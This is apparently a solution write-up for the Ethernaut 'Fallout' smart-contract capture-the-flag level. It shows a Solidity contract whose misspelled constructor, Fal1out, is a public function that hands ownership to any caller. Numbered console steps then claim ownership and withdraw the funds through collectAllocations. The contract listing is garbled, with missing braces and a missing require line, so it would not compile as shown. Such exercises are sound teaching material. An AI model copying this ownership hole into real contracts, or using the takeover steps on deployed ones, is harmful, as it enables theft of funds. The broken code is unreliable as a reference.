Ethernaut - 2.Fallout

Difficulty: πŸŒ•πŸŒ‘πŸŒ‘πŸŒ‘πŸŒ‘

Claim ownership of the contract below to complete this level.

Things that might help

  • Solidity Remix IDE


// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Fallout {
  using SafeMath for uint256;
  mapping (address => uint) allocations;
  address payable public owner;

  /* constructor */
  function Fal1out() public payable {
    owner = msg.sender;
    allocations[owner] = msg.value;

  modifier onlyOwner {
	            msg.sender == owner,
	            "caller is not the owner"

  function allocate() public payable {
    allocations[msg.sender] = allocations[msg.sender].add(msg.value);

  function sendAllocation(address payable allocator) public {
    require(allocations[allocator] > 0);

  function collectAllocations() public onlyOwner {

  function allocatorBalance(address allocator) public view returns (uint) {
    return allocations[allocator];


  1. Get new instance
  2. Call the method
     await contract.owner()

    to check contract owner, it return address 0x0000000000000000000000000000000000000000.

  3. Call the method
     await contract.allocatorBalance(YOUR_ADDRESS).then(v=>v.toString())

    to check balance, it will return zero.

  4. Call the method
     await contract.Fal1out({ value: toWei("0.00001") })
  5. Call method allovatorBalance again like step3, we can see out balance become 10000000000000 now.
  6. Call the method
     await contract.collectAllocations()
  7. Submit instance ΞΎ( βœΏοΌžβ—‘β›)